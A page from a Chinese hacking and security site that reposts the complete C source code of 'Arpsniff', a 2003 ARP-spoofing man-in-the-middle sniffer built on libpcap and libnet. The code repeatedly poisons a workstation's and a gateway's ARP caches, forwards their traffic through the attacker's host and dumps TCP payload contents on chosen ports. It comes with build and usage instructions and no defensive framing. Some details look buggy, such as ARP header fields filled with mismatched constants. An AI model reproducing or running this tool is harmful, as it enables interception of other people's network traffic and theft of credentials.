为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

Arpsniff的实现代码

2009-8-21 14:07| 投稿: security

摘要: /*============================================================================Coder: Paris-y...
/*============================================================================Coder: Paris-yeReleased on: 1/9/2003Test on: redhat 9.0Our Team:Www.Bugkidz.OrgInformation:This is a arp spoof sniffer.W <--- workstationB <--- Server or GateWayM <--- Man in the middle (agent),self IP addressMake:first you must install "pcap" and "libnet"gcc -I/usr/local/include -L/usr/local/lib -o sniffer sniffer.c -lpcap -lnetUsage:./sniffer -I [Interface] -M [Self IP] -W [Workstation IP] -S [Server IP] -P [port]============================================================================*/#include <stdio.h>#include <net/if.h>#include <sys/ioctl.h>#include <pcap.h>#include <libnet.h>#define MAXBUF 1024*4#define PCAP_TOUT 5#define PROMISC 0#define TRUE 1#define FALSE 0/* Ethernet protocol ID's */    #define ETHERTYPE_PUP           0x0200          /* Xerox PUP */#define ETHERTYPE_IP            0x0800          /* IP */#define ETHERTYPE_ARP           0x0806          /* Address resolution */#define ETHERTYPE_REVARP        0x8035          /* Reverse ARP *//* This structure defines an ethernet arp header. *//* ARP protocol opcodes. */#define ARPOP_REQUEST   1               /* ARP request. */#define ARPOP_REPLY     2               /* ARP reply. */#define ARPOP_RREQUEST 3               /* RARP request. */#define ARPOP_RREPLY    4               /* RARP reply. */#define ARPOP_InREQUEST 8               /* InARP request. */#define ARPOP_InREPLY   9               /* InARP reply. */#define ARPOP_NAK       10              /* (ATM)ARP NAK. *//* ARP protocol HARDWARE identifiers. */#define ARPHRD_NETROM   0               /* From KA9Q: NET/ROM pseudo. */#define ARPHRD_ETHER    1               /* Ethernet 10/100Mbps. */#define ARPHRD_EETHER   2               /* Experimental Ethernet. */#define ARPHRD_AX25     3               /* AX.25 Level 2. */#define ARPHRD_PRONET   4               /* PROnet token ring. */#define ARPHRD_CHAOS    5               /* Chaosnet. */#define ARPHRD_IEEE802 6               /* IEEE 802.2 Ethernet/TR/TB. */#define ARPHRD_ARCNET   7               /* ARCnet. */#define ARPHRD_APPLETLK 8               /* APPLEtalk. */#define ARPHRD_DLCI     15              /* Frame Relay DLCI. */#define ARPHRD_ATM      19              /* ATM. */#define ARPHRD_METRICOM 23              /* Metricom STRIP (new IANA id). *//* Dummy types for non ARP hardware */#define ARPHRD_SLIP       0x256#define ARPHRD_CSLIP      0x257#define ARPHRD_SLIP6      0x258#define ARPHRD_CSLIP6     0x259#define ARPHRD_RSRVD      0x260             /* Notional KISS type. */#define ARPHRD_ADAPT      0x264#define ARPHRD_ROSE       0x270 #define ARPHRD_X25        0x271             /* CCITT X.25. */#define ARPHDR_HWX25      0x272             /* Boards with X.25 in firmware. */#define ARPHRD_PPP        0x512#define ARPHRD_CISCO      0x513             /* Cisco HDLC. */#define ARPHRD_HDLC       ARPHRD_CISCO#define ARPHRD_LAPB       0x516             /* LAPB. */#define ARPHRD_DDCMP      0x517             /* Digital's DDCMP. */#define ARPHRD_RAWHDLC    0x518             /* Raw HDLC. */    #define ARPHRD_TUNNEL     0x768             /* IPIP tunnel. */#define ARPHRD_TUNNEL6    0x769             /* IPIP6 tunnel. */#define ARPHRD_FRAD       0x770             /* Frame Relay Access Device. */#define ARPHRD_SKIP       0x771             /* SKIP vif. */#define ARPHRD_LOOPBACK   0x772             /* Loopback device. */#define ARPHRD_LOCALTLK   0x773             /* Localtalk device. */#define ARPHRD_FDDI       0x774             /* Fiber Distributed Data Interface. */#define ARPHRD_BIF        0x775             /* AP1000 BIF. */ #define ARPHRD_SIT        0x776             /* sit0 device - IPv6-in-IPv4. */#define ARPHRD_IPDDP      0x777             /* IP-in-DDP tunnel. */#define ARPHRD_IPGRE      0x778             /* GRE over IP. */#define ARPHRD_PIMREG     0x779             /* PIMSM register interface. */#define ARPHRD_HIPPI      0x780             /* High Performance Parallel I'face. */#define ARPHRD_ASH        0x781             /* (Nexus Electronics) Ash. */#define ARPHRD_ECONET     0x782             /* Acorn Econet. */#define ARPHRD_IRDA       0x783             /* Linux-IrDA. */#define ARPHRD_FCPP       0x784             /* Point to point fibrechanel. */#define ARPHRD_FCAL       0x785             /* Fibrechanel arbitrated loop. */#define ARPHRD_FCPL       0x786             /* Fibrechanel public loop. */#define ARPHRD_FCPFABRIC 0x787             /* Fibrechanel fabric. */#define ARPHRD_IEEE802_TR 0x800             /* Magic type ident for TR. */#define ARPHRD_IEEE80211 0x801             /* IEEE 802.11. *//* IP version number */#define IPVERSION       4struct ether_header{u_int8_t ether_dhost[6];      /* destination eth addr */u_int8_t ether_shost[6];      /* source ether addr    */u_int16_t ether_type;          /* packet type ID field */};struct arphdr{        unsigned short int ar_hrd;          /* Format of hardware address. */        unsigned short int ar_pro;          /* Format of protocol address. */        unsigned char ar_hln;               /* Length of hardware address. */        unsigned char ar_pln;               /* Length of protocol address. */        unsigned short int ar_op;           /* ARP opcode (command). */        unsigned char __ar_sha[6];          /* Sender hardware address. */        unsigned char __ar_sip[4];          /* Sender IP address. */        unsigned char __ar_tha[6];          /* Target hardware address. */        unsigned char __ar_tip[4];          /* Target IP address. */};/** Structure of an internet header, naked of options.*/struct iphead{unsigned int ip_hl:4;               /* header length */unsigned int ip_v:4;                /* version */u_int8_t ip_tos;                    /* type of service */u_short ip_len;                     /* total length */u_short ip_id;                      /* identification */u_short ip_off;                     /* fragment offset field */u_int8_t ip_ttl;                    /* time to live */u_int8_t ip_p;                      /* protocol */u_short ip_sum;                     /* checksum */u_char ip_src[4], ip_dst[4];      /* source and dest address */};struct tcphead{    u_int16_t th_sport;         /* source port */    u_int16_t th_dport;         /* destination port */    u_int32_t th_seq;             /* sequence number */    u_int32_t th_ack;             /* acknowledgement number */    u_int8_t th_off:4;          /* data offset */    u_int8_t th_x2:4;           /* (unused) */    u_int8_t th_flags;#define TH_FIN        0x01#define TH_SYN        0x02#define TH_RST        0x04#define TH_PUSH       0x08#define TH_ACK        0x10#define TH_URG        0x20    u_int16_t th_win;           /* window */    u_int16_t th_sum;           /* checksum */    u_int16_t th_urp;           /* urgent pointer */};/** W , S , M 's ip and mac address*/struct ipmacaddr{u_char ipW[4];u_char macW[6];u_char ipS[4];u_char macS[6];u_char ipM[4];u_char macM[6];};int usage(char* argv){printf("====================================\n");printf("============Arp Sniffer=============\n");printf("==========Write by Paris-Ye=========\n");        printf("===Usage: %s -I [interface] -M [Self IP] -W [Workstation IP] -S [Server IP] -P [port]\n", argv);printf("===For example:\n");printf("\t%s -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254\n",argv);        return 0;}/*send arp packet function*/int arpsend(libnet_t* lnet,u_char* smac,u_char* sip,u_char* dmac,u_char* dip){int ret=0;u_char* packet;u_long packets;libnet_ptag_t t;struct ether_header* ethh;struct arphdr* arph;packets=sizeof(struct ether_header)+sizeof(struct arphdr);packet = malloc(packets);ethh = (struct ether_header* ) packet;arph = (struct arphdr* ) (packet+sizeof(struct ether_header));memcpy(ethh->ether_dhost,dmac,6);memcpy(ethh->ether_shost,smac,6);ethh->ether_type = htons(ETHERTYPE_ARP);arph->ar_hrd = htons(ARPOP_REQUEST);arph->ar_pro = htons(ARPHRD_IEEE802_TR);arph->ar_hln = 6;arph->ar_pln = 4;arph->ar_op = htons(ARPHRD_ETHER);memcpy(arph->__ar_sha,smac,6);memcpy(arph->__ar_sip,sip,4);bzero(arph->__ar_tha,6);memcpy(arph->__ar_tip,dip,4);ret = libnet_write_link(lnet,packet,packets);if(ret == -1){return FALSE;}return TRUE;}/*Send spoof arp S And W every 6 second interval*/void arpspoof(libnet_t* lnet,struct ipmacaddr* ipmac){while(TRUE){arpsend(lnet,ipmac->macM,ipmac->ipS,ipmac->macW,ipmac->ipW);arpsend(lnet,ipmac->macM,ipmac->ipW,ipmac->macS,ipmac->ipS);sleep(6);}}/*Forward packets W--->S or S--->W*/int forwarddate(libnet_t* lnet,const u_char* packet,int len,u_char* macW,u_char* macS,u_char* macM){int ret=0;const u_char* datapoint=packet;struct ether_header* ethhdr;struct iphead*       iph;ethhdr = (struct ether_header*) datapoint;if(ntohs(ethhdr->ether_type)!=ETHERTYPE_IP)return TRUE;if(!memcmp(ethhdr->ether_shost,macM,6)) /*if the Source Mac is agent(M)'s come back*/return TRUE;if(memcmp(ethhdr->ether_dhost,macM,6)) /*if the Source Mac Destination is't agent(M)'s come back*/return TRUE;if(!memcmp(ethhdr->ether_shost,macW,6)) /*if the Source Mac is W's(Workstation)*/{memcpy(ethhdr->ether_shost,macM,6);memcpy(ethhdr->ether_dhost,macS,6);ret = libnet_write_link(lnet,(u_char*)datapoint,len);}if(!memcmp(ethhdr->ether_shost,macS,6)) /*if the Source Mac is S S's(server)*/{memcpy(ethhdr->ether_shost,macM,6);memcpy(ethhdr->ether_dhost,macW,6);ret = libnet_write_link(lnet,(u_char*)datapoint,len);}return TRUE;}/*print hex date to Ascii */void printdat(u_char* packet,int len){int i=0,j=0;u_char str[16];for(i=0;i<=len-16;i+=16){memcpy(str,packet+i,16);fprintf(stdout,"%02x%02x%02x%02x %02x%02x%02x%02x %02x%02x%02x%02x %02x%02x%02x%02x ",str[0],str[1],str[2],str[3],str[4],str[5],str[6],str[7],str[8],str[9],str[10],str[11],str[12],str[13],str[14],str[15]);for(j=0;j<16;j++){if(str[j] < 32 || str[j] > 126)str[j]='.';}fprintf(stdout,"%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c\n",str[0],str[1],str[2],str[3],str[4],str[5],str[6],str[7],str[8],str[9],str[10],str[11],str[12],str[13],str[14],str[15]);}if(i!=len){memcpy(str,packet+i,16);for(j=0;j<16;j++){if(j%4==0 && j!=0)fprintf(stdout," ");if((i+j)<len){fprintf(stdout,"%02x",str[j]);}elsefprintf(stdout," ");}fprintf(stdout," ");for(j=0;j<16;j++){if((i+j)<len){if(str[j] < 32 || str[j] > 126)str[j]='.';fprintf(stdout,"%c",str[j]);}}fprintf(stdout,"\n\n");}}/*parse packet*/int parsedate(const u_char* packet,int len,u_char* macW,u_char* macS,u_char* macM,u_char* ipW,u_char* ipS,int* port){int i=0;int     contents;u_char* content;const u_char* datapoint=packet;struct ether_header* ethhdr;struct iphead*       iph;struct tcphead*      tcph;ethhdr = (struct ether_header*) datapoint;iph = (struct iphead*) (datapoint+sizeof(struct ether_header));tcph = (struct tcphead*) (datapoint+sizeof(struct ether_header)+sizeof(struct iphead));if(memcmp(ethhdr->ether_shost,macW,6) && memcmp(ethhdr->ether_shost,macS,6))return FALSE;if(memcmp(ethhdr->ether_dhost,macM,6))return FALSE;if(ntohs(ethhdr->ether_type)!=ETHERTYPE_IP)return FALSE;if(iph->ip_v != 4 || iph->ip_hl != 5)return FALSE;if(!(!memcmp(iph->ip_dst,ipW,4) || !memcmp(iph->ip_src,ipW,4)))return FALSE;if(iph->ip_p != IPPROTO_TCP)return FALSE;contents = htons(iph->ip_len)-sizeof(struct iphead)-sizeof(struct tcphead);content = (u_char *)(datapoint+sizeof(struct ether_header)+sizeof(struct iphead)+sizeof(struct tcphead));if((tcph->th_flags & TH_PUSH)){for(i==0;port[i]!=0;i++){printf("=====%d %d\n",port[i],htons(tcph->th_dport));if(port[i]==htons(tcph->th_dport) || port[i]==htons(tcph->th_sport))break;}if(port[i]==0)return;printf("Size:[%d] [%d.%d.%d.%d:%d]->[%d.%d.%d.%d:%d]\n",htons(iph->ip_len),iph->ip_src[0],iph->ip_src[1],iph->ip_src[2],iph->ip_src[3],htons(tcph->th_sport),iph->ip_dst[0],iph->ip_dst[1],iph->ip_dst[2],iph->ip_dst[3],htons(tcph->th_dport));printdat(content,contents);}return TRUE;}/*Sniffer packets*/int agentpacket(libnet_t* lnet,pcap_t* lpcap,struct ipmacaddr* ipmac,int* port){const u_char* packet;struct pcap_pkthdr hdr;while(1){packet=pcap_next(lpcap,&hdr);if(packet==NULL || hdr.len==0)continue;parsedate(packet,hdr.len,ipmac->macW,ipmac->macS,ipmac->macM,ipmac->ipW,ipmac->ipS,port);forwarddate(lnet,packet,hdr.len,ipmac->macW,ipmac->macS,ipmac->macM);}return TRUE;}/*When initialize Get the S and W Mac addressSend arp request */int gettargetmac(libnet_t* lnet,struct ipmacaddr* ipmac){while(1){arpsend(lnet,ipmac->macM,ipmac->ipM,ipmac->macW,ipmac->ipW);arpsend(lnet,ipmac->macM,ipmac->ipM,ipmac->macS,ipmac->ipS);sleep(1);}return TRUE;}/*When initialize Get the S and W Mac addressparse arp reply*/int getmacaddress(char* dev,libnet_t* lnet,pcap_t* lpcap,struct ipmacaddr* ipmac){int skfd=0;unsigned int isgetmac=0x0;pid_t pid=0;struct ifreq ifr;const u_char* packet;struct pcap_pkthdr hdr;struct ether_header* ethhdr;struct arphdr* arph;//----------get local mac adrressstrcpy(ifr.ifr_name,dev);skfd = socket(AF_INET,SOCK_DGRAM,0);if(skfd<0){printf("Can't open socket!\n");return FALSE;}if(ioctl(skfd, SIOCGIFHWADDR, &ifr) < 0){printf("Can't read local mac address!\n");return FALSE;}memcpy(ipmac->macM,ifr.ifr_hwaddr.sa_data,6);close(skfd);//----------get target mac addresspid = fork();if(pid==0){gettargetmac(lnet,ipmac);exit(TRUE);}while(1){packet=pcap_next(lpcap,&hdr);if(packet==NULL || hdr.len==0)continue;ethhdr = (struct ether_header*) packet;arph = (struct arphdr*) (packet+sizeof(struct ether_header));if(memcmp(ethhdr->ether_dhost,ipmac->macM,6))continue;if(ntohs(ethhdr->ether_type)!=ETHERTYPE_ARP)continue;if(!memcmp(arph->__ar_sip,ipmac->ipW,4) && !memcmp(arph->__ar_tip,ipmac->ipM,4)){memcpy(ipmac->macW,arph->__ar_sha,6);isgetmac=0xFFFF0000 | isgetmac;}if(!memcmp(arph->__ar_sip,ipmac->ipS,4) && !memcmp(arph->__ar_tip,ipmac->ipM,4)){memcpy(ipmac->macS,arph->__ar_sha,6);isgetmac=0x0000FFFF | isgetmac;}if(isgetmac == 0xFFFFFFFF)break;}kill(pid,9);return TRUE;}int main(int argc,char* argv[]){int         ret=0,i=0;char *p,*s;char c;char string[]="I:M:W:S:P:";int port[100];char dev[32]="";struct ipmacaddr ipmac;pid_t pid;libnet_t* lnet;pcap_t*     lpcap;bpf_u_int32 netp,maskp;struct bpf_program fp;char        err[PCAP_ERRBUF_SIZE];char        filterstr[]="";unsigned int ipM;unsigned int ipW;unsigned int ipS;u_char macW[] = {255,255,255,255,255,255,255};u_char macS[] = {255,255,255,255,255,255,255};u_char macM[] = {255,255,255,255,255,255,255};bzero(&ipmac,sizeof(struct ipmacaddr));if(argc<8){usage(argv[0]);return FALSE;}while((c = getopt(argc, argv, string)) != EOF){switch(c){case('I'):strcpy(dev,optarg);break;case('M'):ipM = inet_addr(optarg);memcpy(ipmac.ipM,(void*)&ipM,4);break;case('W'):ipW = inet_addr(optarg);memcpy(ipmac.ipW,(void*)&ipW,4);break;case('S'):ipS = inet_addr(optarg);memcpy(ipmac.ipS,(void*)&ipS,4);break;case('P'):printf("%s\n",optarg);s = optarg;      p=strtok(s,":");        while(p)        {port[i]=atoi(p);          printf("%d\n",port[i]);          p=strtok(NULL,":");i++;       }port[i]=0;break;default:usage(argv[0]);return FALSE;}}memcpy(ipmac.macW,macW,6);memcpy(ipmac.macS,macS,6);memcpy(ipmac.macM,macM,6);ret = pcap_lookupnet(dev,&netp,&maskp,err);if(ret == -1){printf("Can't initialize PCAP![%s]\n",err);return FALSE;}lpcap = pcap_open_live(dev,MAXBUF,PROMISC,PCAP_TOUT,err);if(lpcap == NULL){printf("Can't initialize PCAP![%s]\n",err);return FALSE;}ret = pcap_compile(lpcap,&fp,filterstr,0,netp);if(ret == -1){printf("Error pcap_compile!\n");return FALSE;}ret = pcap_setfilter(lpcap,&fp);if(ret == -1){printf("Error pcap_setfilter!\n");return FALSE;}lnet = libnet_init(LIBNET_LINK,dev,err);if(lnet == NULL){printf("Can't initialize libnet!Please check the [dev]\n");return FALSE;}ret = getmacaddress(dev,lnet,lpcap,&ipmac);printf("Get network cards mac address:\n");printf("M-> %02x:%02x:%02x:%02x:%02x:%02x\n",ipmac.macM[0],ipmac.macM[1],ipmac.macM[2],ipmac.macM[3],ipmac.macM[4],ipmac.macM[5],ipmac.macM[6]);printf("W-> %02x:%02x:%02x:%02x:%02x:%02x\n",ipmac.macW[0],ipmac.macW[1],ipmac.macW[2],ipmac.macW[3],ipmac.macW[4],ipmac.macW[5],ipmac.macW[6]);printf("S-> %02x:%02x:%02x:%02x:%02x:%02x\n",ipmac.macS[0],ipmac.macS[1],ipmac.macS[2],ipmac.macS[3],ipmac.macS[4],ipmac.macS[5],ipmac.macS[6]);printf("\nNow Start... .. .\n");if(ret == FALSE){return FALSE;}pid = fork();if(pid==0){arpspoof(lnet,&ipmac);return FALSE;}else{agentpacket(lnet,lpcap,&ipmac,port);}libnet_destroy(lnet);pcap_close(lpcap);printf("Done\n");return TRUE;}

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部